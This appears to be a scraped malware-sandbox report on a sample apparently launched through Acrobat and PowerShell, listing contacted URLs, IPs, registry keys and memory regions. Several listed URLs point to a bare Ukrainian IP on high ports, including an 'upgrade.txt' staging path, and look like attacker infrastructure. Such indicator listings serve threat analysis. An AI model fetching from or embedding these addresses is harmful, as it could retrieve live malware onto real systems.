|
https://g.live.com/odclientsettings/ProdV2.C:
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://2.59.222.98:43820(
|
unknown
|
||
|
https://g.live.com/odclientsettings/Prod/C:
|
unknown
|
||
|
http://2.59.222.98:28402/page107Bytestf8.GetBytesesX
|
unknown
|
||
|
http://2.59.222.98:28402/page107X
|
unknown
|
||
|
http://crl.m1
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://2.59.222.98:43820/kfngnhbxfhjaucie/page107/upgrade.txt
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://oneget.org
|
unknown
|
There are 18 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
x1.i.lencr.org
|
unknown
|
|
|
|
bg.microsoft.map.fastly.net
|
199.232.214.172
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
2.59.222.98
|
unknown
|
Ukraine
|
|
|
|
23.41.168.139
|
unknown
|
United States
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.ApplicationCompany
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
aFS
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
tDIText
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
tFileName
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
tFileSource
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
sFileAncestors
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
sDI
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
sDate
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
uFileSize
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
uPageCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
sAssetId
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c1
|
bisSharedFile
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
aFS
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
tDIText
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
tFileName
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
sDI
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
sDate
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
uFileSize
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral\cRecentFiles\c2
|
uPageCount
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
There are 26 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
245D7686000
|
heap
|
page read and write
|
|
|
|
107F6460000
|
heap
|
page read and write
|
|
|
|
26B63953000
|
trusted library allocation
|
page read and write
|
|
|
|
1078019C000
|
trusted library allocation
|
page read and write
|
|
|
|
245D7680000
|
heap
|
page read and write
|
|
|
|
1DE613B1000
|
trusted library allocation
|
page read and write
|
|
|
|
245D76C5000
|
heap
|
page read and write
|
|
|
|
26B639B6000
|
trusted library allocation
|
page read and write
|
|
|
|
10780085000
|
trusted library allocation
|
page read and write
|
|
|
|
1DE79AE7000
|
heap
|
page read and write
|
|
|
|
245D7825000
|
heap
|
page read and write
|
|
|
|
18899B05000
|
heap
|
page read and write
|
|
|
|
107F64F2000
|
heap
|
page read and write
|
|
|
|
18899997000
|
heap
|
page read and write
|
|
|
|
1DE62CF0000
|
trusted library allocation
|
page read and write
|
|
|
|
18899957000
|
heap
|
page read and write
|
|
|
|
1889994C000
|
heap
|
page read and write
|
|
|
|
245D76DF000
|
heap
|
page read and write
|
|
|
|
1DE5F7E0000
|
heap
|
page read and write
|
|
|
|
27DA8B04000
|
heap
|
page read and write
|
||
|
26B61BF0000
|
heap
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page read and write
|
||
|
26B5FF4B000
|
heap
|
page read and write
|
||
|
E2FD4FE000
|
unkown
|
page readonly
|
||
|
1DE610A0000
|
trusted library allocation
|
page read and write
|
||
|
26B5FF1B000
|
heap
|
page read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
1DE79A80000
|
heap
|
page read and write
|
||
|
1078010B000
|
trusted library allocation
|
page read and write
|
||
|
27DADD20000
|
trusted library allocation
|
page read and write
|
||
|
27DA82AE000
|
heap
|
page read and write
|
||
|
27DA8213000
|
heap
|
page read and write
|
||
|
40317E000
|
stack
|
page read and write
|
||
|
403578000
|
stack
|
page read and write
|
||
|
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
|
A54F4FE000
|
stack
|
page read and write
|
||
|
107F8456000
|
heap
|
page read and write
|
||
|
188998F0000
|
heap
|
page read and write
|
||
|
26B600D0000
|
heap
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E0C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1889998F000
|
heap
|
page read and write
|
||
|
26B7A3D0000
|
heap
|
page read and write
|
||
|
7FF848F21000
|
trusted library allocation
|
page read and write
|
||
|
18899AC0000
|
heap
|
page read and write
|
||
|
26B7A42E000
|
heap
|
page read and write
|
||
|
A54F3FE000
|
stack
|
page read and write
|
||
|
7FF848FB0000
|
trusted library allocation
|
page read and write
|
||
|
10780123000
|
trusted library allocation
|
page read and write
|
||
|
27DA82A2000
|
heap
|
page read and write
|
||
|
1DE5F8CD000
|
heap
|
page read and write
|
||
|
1DE620D9000
|
trusted library allocation
|
page read and write
|
||
|
E2FD6FE000
|
unkown
|
page readonly
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
26B63C53000
|
trusted library allocation
|
page read and write
|
||
|
E2FD3FD000
|
stack
|
page read and write
|
||
|
26B5FEA0000
|
heap
|
page read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
26B5FF00000
|
heap
|
page read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
1DE5FA80000
|
heap
|
page read and write
|
||
|
7FF848F30000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EEA000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FD0000
|
trusted library allocation
|
page read and write
|
||
|
1DE5FA85000
|
heap
|
page read and write
|
||
|
7FF848F40000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848F2A000
|
trusted library allocation
|
page read and write
|
||
|
40367E000
|
stack
|
page read and write
|
||
|
7FF848D72000
|
trusted library allocation
|
page read and write
|
||
|
1DE62A2A000
|
trusted library allocation
|
page read and write
|
||
|
27DA8A15000
|
heap
|
page read and write
|
||
|
107F6640000
|
heap
|
page read and write
|
||
|
107F8710000
|
heap
|
page execute and read and write
|
||
|
10780155000
|
trusted library allocation
|
page read and write
|
||
|
26B7A3C0000
|
heap
|
page execute and read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
27DAD8D6000
|
heap
|
page read and write
|
||
|
27DA826A000
|
heap
|
page read and write
|
||
|
E136DFE000
|
stack
|
page read and write
|
||
|
27DADA90000
|
trusted library allocation
|
page read and write
|
||
|
26B7A1B1000
|
heap
|
page read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
27DAD750000
|
trusted library allocation
|
page read and write
|
||
|
27DAD81F000
|
heap
|
page read and write
|
||
|
27DA81D0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E2C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DE61210000
|
heap
|
page read and write
|
||
|
27DAD750000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FE0000
|
trusted library allocation
|
page read and write
|
||
|
27DAD7C0000
|
trusted library allocation
|
page read and write
|
||
|
1DE79718000
|
heap
|
page read and write
|
||
|
1DE61100000
|
heap
|
page execute and read and write
|
||
|
1DE62B98000
|
trusted library allocation
|
page read and write
|
||
|
E1373FE000
|
stack
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
107F64EC000
|
heap
|
page read and write
|
||
|
C452D1F000
|
unkown
|
page read and write
|
||
|
26B61F70000
|
trusted library allocation
|
page read and write
|
||
|
27DAD780000
|
trusted library allocation
|
page read and write
|
||
|
27DA8B5A000
|
heap
|
page read and write
|
||
|
D35077C000
|
stack
|
page read and write
|
||
|
404183000
|
stack
|
page read and write
|
||
|
27DA8190000
|
heap
|
page read and write
|
||
|
D35017B000
|
stack
|
page read and write
|
||
|
50CB0FD000
|
stack
|
page read and write
|
||
|
107F8730000
|
trusted library allocation
|
page read and write
|
||
|
26B6198E000
|
heap
|
page read and write
|
||
|
27DAD800000
|
heap
|
page read and write
|
||
|
26B62F53000
|
trusted library allocation
|
page read and write
|
||
|
27DA82B3000
|
heap
|
page read and write
|
||
|
7FF848D53000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848D54000
|
trusted library allocation
|
page read and write
|
||
|
27DA8302000
|
heap
|
page read and write
|
||
|
50CB2FF000
|
stack
|
page read and write
|
||
|
E2FED7E000
|
stack
|
page read and write
|
||
|
1DE6300D000
|
trusted library allocation
|
page read and write
|
||
|
26B61960000
|
heap
|
page read and write
|
||
|
10780108000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D5D000
|
trusted library allocation
|
page execute and read and write
|
||
|
27DA8D00000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D60000
|
trusted library allocation
|
page read and write
|
||
|
27DADA40000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F80000
|
trusted library allocation
|
page read and write
|
||
|
26B7A236000
|
heap
|
page read and write
|
||
|
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
|
1DE62998000
|
trusted library allocation
|
page read and write
|
||
|
107F849F000
|
heap
|
page read and write
|
||
|
27DAD7C3000
|
trusted library allocation
|
page read and write
|
||
|
D34FC86000
|
stack
|
page read and write
|
||
|
1DE62A22000
|
trusted library allocation
|
page read and write
|
||
|
26B721E5000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F00000
|
trusted library allocation
|
page execute and read and write
|
||
|
A54F57D000
|
stack
|
page read and write
|
||
|
26B7A1A8000
|
heap
|
page read and write
|
||
|
27DAD82C000
|
heap
|
page read and write
|
||
|
1DE79836000
|
heap
|
page execute and read and write
|
||
|
27DA8264000
|
heap
|
page read and write
|
||
|
27DADA80000
|
trusted library allocation
|
page read and write
|
||
|
1DE5F750000
|
heap
|
page read and write
|
||
|
7FF848EF0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
|
107F66C0000
|
heap
|
page read and write
|
||
|
27DAD8D4000
|
heap
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
27DAD913000
|
heap
|
page read and write
|
||
|
7FF848ED2000
|
trusted library allocation
|
page read and write
|
||
|
27DAD790000
|
trusted library allocation
|
page read and write
|
||
|
27DA8302000
|
heap
|
page read and write
|
||
|
26B61F73000
|
trusted library allocation
|
page read and write
|
||
|
27DA8B1A000
|
heap
|
page read and write
|
||
|
27DA8B02000
|
heap
|
page read and write
|
||
|
1DE62B8F000
|
trusted library allocation
|
page read and write
|
||
|
27DADD70000
|
trusted library allocation
|
page read and write
|
||
|
D3501FF000
|
stack
|
page read and write
|
||
|
107F649E000
|
heap
|
page read and write
|
||
|
18899B00000
|
heap
|
page read and write
|
||
|
1DE79A90000
|
heap
|
page read and write
|
||
|
7FF848D34000
|
trusted library allocation
|
page read and write
|
||
|
26B61B2C000
|
heap
|
page read and write
|
||
|
E136FFF000
|
stack
|
page read and write
|
||
|
26B7A030000
|
heap
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
26B62020000
|
heap
|
page read and write
|
||
|
7FF848F12000
|
trusted library allocation
|
page read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
26B620D4000
|
trusted library allocation
|
page read and write
|
||
|
26B5FFBA000
|
heap
|
page read and write
|
||
|
A54EFCF000
|
stack
|
page read and write
|
||
|
1DE610C0000
|
trusted library allocation
|
page read and write
|
||
|
10780111000
|
trusted library allocation
|
page read and write
|
||
|
10780011000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F40000
|
trusted library allocation
|
page read and write
|
||
|
2756EFA0000
|
heap
|
page read and write
|
||
|
26B7A2B0000
|
heap
|
page execute and read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
107F8733000
|
trusted library allocation
|
page read and write
|
||
|
27DA822B000
|
heap
|
page read and write
|
||
|
107F6472000
|
heap
|
page read and write
|
||
|
1DE5F81F000
|
heap
|
page read and write
|
||
|
27DAD751000
|
trusted library allocation
|
page read and write
|
||
|
26B7A1F6000
|
heap
|
page read and write
|
||
|
27DA8297000
|
heap
|
page read and write
|
||
|
107F6710000
|
trusted library allocation
|
page read and write
|
||
|
4036FE000
|
stack
|
page read and write
|
||
|
D3502FD000
|
stack
|
page read and write
|
||
|
27DAD794000
|
trusted library allocation
|
page read and write
|
||
|
107F6720000
|
heap
|
page readonly
|
||
|
26B7A5D0000
|
heap
|
page read and write
|
||
|
7FF848E06000
|
trusted library allocation
|
page read and write
|
||
|
A54F67E000
|
stack
|
page read and write
|
||
|
26B5FFC2000
|
heap
|
page read and write
|
||
|
50CB1FE000
|
stack
|
page read and write
|
||
|
7FF848E56000
|
trusted library allocation
|
page execute and read and write
|
||
|
107F64BE000
|
heap
|
page read and write
|
||
|
D35057E000
|
stack
|
page read and write
|
||
|
1DE796F0000
|
heap
|
page read and write
|
||
|
245D7650000
|
heap
|
page read and write
|
||
|
1DE5F8C7000
|
heap
|
page read and write
|
||
|
107F84E2000
|
heap
|
page read and write
|
||
|
D350477000
|
stack
|
page read and write
|
||
|
26B5FFB3000
|
heap
|
page read and write
|
||
|
27DA82B3000
|
heap
|
page read and write
|
||
|
7FF848F70000
|
trusted library allocation
|
page read and write
|
||
|
27DAD862000
|
heap
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
1078055F000
|
trusted library allocation
|
page read and write
|
||
|
26B61B20000
|
heap
|
page read and write
|
||
|
107F84DB000
|
heap
|
page read and write
|
||
|
1DE5F86C000
|
heap
|
page read and write
|
||
|
7FF848F70000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D40000
|
trusted library allocation
|
page read and write
|
||
|
107F64A6000
|
heap
|
page read and write
|
||
|
107F8479000
|
heap
|
page read and write
|
||
|
4032FE000
|
stack
|
page read and write
|
||
|
7FF848F52000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D8B000
|
trusted library allocation
|
page read and write
|
||
|
D3506FE000
|
stack
|
page read and write
|
||
|
107F8606000
|
heap
|
page execute and read and write
|
||
|
D3504FA000
|
stack
|
page read and write
|
||
|
27DA8306000
|
heap
|
page read and write
|
||
|
2756EFA8000
|
heap
|
page read and write
|
||
|
188998D0000
|
heap
|
page read and write
|
||
|
26B7A405000
|
heap
|
page read and write
|
||
|
27DAD8F8000
|
heap
|
page read and write
|
||
|
2756F334000
|
heap
|
page read and write
|
||
|
A54F27F000
|
stack
|
page read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
188997F0000
|
heap
|
page read and write
|
||
|
1DE610E0000
|
trusted library allocation
|
page read and write
|
||
|
4031FE000
|
stack
|
page read and write
|
||
|
7FF848D4B000
|
trusted library allocation
|
page read and write
|
||
|
27DADA30000
|
trusted library allocation
|
page read and write
|
||
|
27DAD8EE000
|
heap
|
page read and write
|
||
|
107F64E4000
|
heap
|
page read and write
|
||
|
107F8740000
|
heap
|
page read and write
|
||
|
D34FD8E000
|
stack
|
page read and write
|
||
|
27DA8B1A000
|
heap
|
page read and write
|
||
|
D3503F6000
|
stack
|
page read and write
|
||
|
27DA8295000
|
heap
|
page read and write
|
||
|
D35007D000
|
stack
|
page read and write
|
||
|
7DF4B3AF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page execute and read and write
|
||
|
50CAEFE000
|
stack
|
page read and write
|
||
|
27DA8B13000
|
heap
|
page read and write
|
||
|
26B5FFD4000
|
heap
|
page read and write
|
||
|
7FF848E16000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
26B63DC8000
|
trusted library allocation
|
page read and write
|
||
|
27DADA20000
|
trusted library allocation
|
page read and write
|
||
|
245D7820000
|
heap
|
page read and write
|
||
|
7FF848D8C000
|
trusted library allocation
|
page execute and read and write
|
||
|
26B63A25000
|
trusted library allocation
|
page read and write
|
||
|
1DE5F825000
|
heap
|
page read and write
|
||
|
27DAD740000
|
trusted library allocation
|
page read and write
|
||
|
27DAD843000
|
heap
|
page read and write
|
||
|
2756EF70000
|
heap
|
page read and write
|
||
|
26B5FEC0000
|
heap
|
page read and write
|
||
|
7FF848D7D000
|
trusted library allocation
|
page execute and read and write
|
||
|
27DA8200000
|
heap
|
page read and write
|
||
|
40327D000
|
stack
|
page read and write
|
||
|
1DE61226000
|
heap
|
page read and write
|
||
|
E2FD0FE000
|
unkown
|
page readonly
|
||
|
27DA8A00000
|
heap
|
page read and write
|
||
|
1DE71567000
|
trusted library allocation
|
page read and write
|
||
|
1DE5F7B0000
|
heap
|
page read and write
|
||
|
7FF848E90000
|
trusted library allocation
|
page execute and read and write
|
||
|
107F8540000
|
heap
|
page read and write
|
||
|
4035FD000
|
stack
|
page read and write
|
||
|
1079006C000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848D33000
|
trusted library allocation
|
page execute and read and write
|
||
|
E2FD9FB000
|
stack
|
page read and write
|
||
|
27DAD770000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F80000
|
trusted library allocation
|
page read and write
|
||
|
27DA82AE000
|
heap
|
page read and write
|
||
|
7FF848F50000
|
trusted library allocation
|
page read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
E1376FB000
|
stack
|
page read and write
|
||
|
27DA96C0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F01000
|
trusted library allocation
|
page read and write
|
||
|
26B63CD9000
|
trusted library allocation
|
page read and write
|
||
|
107F66A0000
|
heap
|
page read and write
|
||
|
107F66F0000
|
trusted library allocation
|
page read and write
|
||
|
26B5FF98000
|
heap
|
page read and write
|
||
|
107F6560000
|
heap
|
page read and write
|
||
|
107F8B30000
|
heap
|
page read and write
|
||
|
27DAD780000
|
trusted library allocation
|
page read and write
|
||
|
26B61BA0000
|
trusted library allocation
|
page read and write
|
||
|
188999CB000
|
heap
|
page read and write
|
||
|
245D7659000
|
heap
|
page read and write
|
||
|
1DE5F82B000
|
heap
|
page read and write
|
||
|
1DE713C1000
|
trusted library allocation
|
page read and write
|
||
|
E2FD5F9000
|
stack
|
page read and write
|
||
|
A55024E000
|
stack
|
page read and write
|
||
|
E13692A000
|
stack
|
page read and write
|
||
|
7FF848F32000
|
trusted library allocation
|
page read and write
|
||
|
E2FCC7B000
|
stack
|
page read and write
|
||
|
107F84A6000
|
heap
|
page read and write
|
||
|
1DE613A0000
|
heap
|
page read and write
|
||
|
107F6469000
|
heap
|
page read and write
|
||
|
26B61B90000
|
heap
|
page readonly
|
||
|
27DA82FF000
|
heap
|
page read and write
|
||
|
27DADAF0000
|
remote allocation
|
page read and write
|
||
|
107F6660000
|
heap
|
page read and write
|
||
|
50CABFE000
|
stack
|
page read and write
|
||
|
27DA82AE000
|
heap
|
page read and write
|
||
|
7FF849000000
|
trusted library allocation
|
page read and write
|
||
|
26B7A440000
|
heap
|
page read and write
|
||
|
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D52000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F60000
|
trusted library allocation
|
page read and write
|
||
|
1DE5F770000
|
heap
|
page read and write
|
||
|
27DADAF0000
|
remote allocation
|
page read and write
|
||
|
1DE79787000
|
heap
|
page read and write
|
||
|
107F6740000
|
trusted library allocation
|
page read and write
|
||
|
27DAD88E000
|
heap
|
page read and write
|
||
|
27DA825B000
|
heap
|
page read and write
|
||
|
7FF848EF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
107804D8000
|
trusted library allocation
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page read and write
|
||
|
107F64A2000
|
heap
|
page read and write
|
||
|
7FF848F50000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
|
27DAD6C0000
|
trusted library allocation
|
page read and write
|
||
|
26B7A400000
|
heap
|
page read and write
|
||
|
27DA828F000
|
heap
|
page read and write
|
||
|
26B7A3DA000
|
heap
|
page read and write
|
||
|
26B5FE90000
|
heap
|
page read and write
|
||
|
D34FDCE000
|
stack
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
D350379000
|
stack
|
page read and write
|
||
|
27DA96A1000
|
trusted library allocation
|
page read and write
|
||
|
27DAD752000
|
trusted library allocation
|
page read and write
|
||
|
27DADA40000
|
trusted library allocation
|
page read and write
|
||
|
107F7FD0000
|
heap
|
page execute and read and write
|
||
|
7FF848DEC000
|
trusted library allocation
|
page execute and read and write
|
||
|
27DAD90A000
|
heap
|
page read and write
|
||
|
26B7A442000
|
heap
|
page read and write
|
||
|
27DAD906000
|
heap
|
page read and write
|
||
|
7FF848E26000
|
trusted library allocation
|
page read and write
|
||
|
27DAD8B0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F20000
|
trusted library allocation
|
page execute and read and write
|
||
|
107F66C5000
|
heap
|
page read and write
|
||
|
1DE61215000
|
heap
|
page read and write
|
||
|
E2FEDFE000
|
unkown
|
page readonly
|
||
|
7FF849000000
|
trusted library allocation
|
page read and write
|
||
|
40337E000
|
stack
|
page read and write
|
||
|
4034F7000
|
stack
|
page read and write
|
||
|
A54F77E000
|
stack
|
page read and write
|
||
|
27DADA20000
|
trusted library allocation
|
page read and write
|
||
|
1078003E000
|
trusted library allocation
|
page read and write
|
||
|
1DE5F866000
|
heap
|
page read and write
|
||
|
7FF848D73000
|
trusted library allocation
|
page execute and read and write
|
||
|
A54F87B000
|
stack
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
27DADAF0000
|
remote allocation
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FE0000
|
trusted library allocation
|
page read and write
|
||
|
1DE610D0000
|
heap
|
page readonly
|
||
|
403073000
|
stack
|
page read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
27DADAA0000
|
trusted library allocation
|
page read and write
|
||
|
26B7A462000
|
heap
|
page read and write
|
||
|
27DA82A0000
|
heap
|
page read and write
|
||
|
7FF848D32000
|
trusted library allocation
|
page read and write
|
||
|
10780A5C000
|
trusted library allocation
|
page read and write
|
||
|
A54F7FE000
|
stack
|
page read and write
|
||
|
7FF848E70000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848F0A000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F10000
|
trusted library allocation
|
page read and write
|
||
|
27DADD80000
|
trusted library allocation
|
page read and write
|
||
|
26B7A198000
|
heap
|
page read and write
|
||
|
26B7A432000
|
heap
|
page read and write
|
||
|
1DE79AA5000
|
heap
|
page read and write
|
||
|
27DA8170000
|
heap
|
page read and write
|
||
|
1078004B000
|
trusted library allocation
|
page read and write
|
||
|
1078015B000
|
trusted library allocation
|
page read and write
|
||
|
E1374FF000
|
stack
|
page read and write
|
||
|
26B720A3000
|
trusted library allocation
|
page read and write
|
||
|
107F847B000
|
heap
|
page read and write
|
||
|
245D74B0000
|
heap
|
page read and write
|
||
|
27DAD900000
|
heap
|
page read and write
|
||
|
26B61BE0000
|
heap
|
page execute and read and write
|
||
|
27DAD8F6000
|
heap
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
|
27DA826E000
|
heap
|
page read and write
|
||
|
1DE79AC8000
|
heap
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
|
E2FCFF7000
|
stack
|
page read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
C452C99000
|
stack
|
page read and write
|
||
|
1078010E000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D74000
|
trusted library allocation
|
page read and write
|
||
|
26B7A41D000
|
heap
|
page read and write
|
||
|
2756EF50000
|
heap
|
page read and write
|
||
|
1DE616D9000
|
trusted library allocation
|
page read and write
|
||
|
1DE63011000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FE0000
|
trusted library allocation
|
page read and write
|
||
|
D3505FF000
|
stack
|
page read and write
|
||
|
27DAD902000
|
heap
|
page read and write
|
||
|
1DE713B1000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EE1000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page read and write
|
||
|
4030FD000
|
stack
|
page read and write
|
||
|
7FF848E36000
|
trusted library allocation
|
page execute and read and write
|
||
|
107F8600000
|
heap
|
page execute and read and write
|
||
|
26B601B5000
|
heap
|
page read and write
|
||
|
26B62553000
|
trusted library allocation
|
page read and write
|
||
|
1DE71424000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F20000
|
trusted library allocation
|
page execute and read and write
|
||
|
107F66D0000
|
trusted library section
|
page read and write
|
||
|
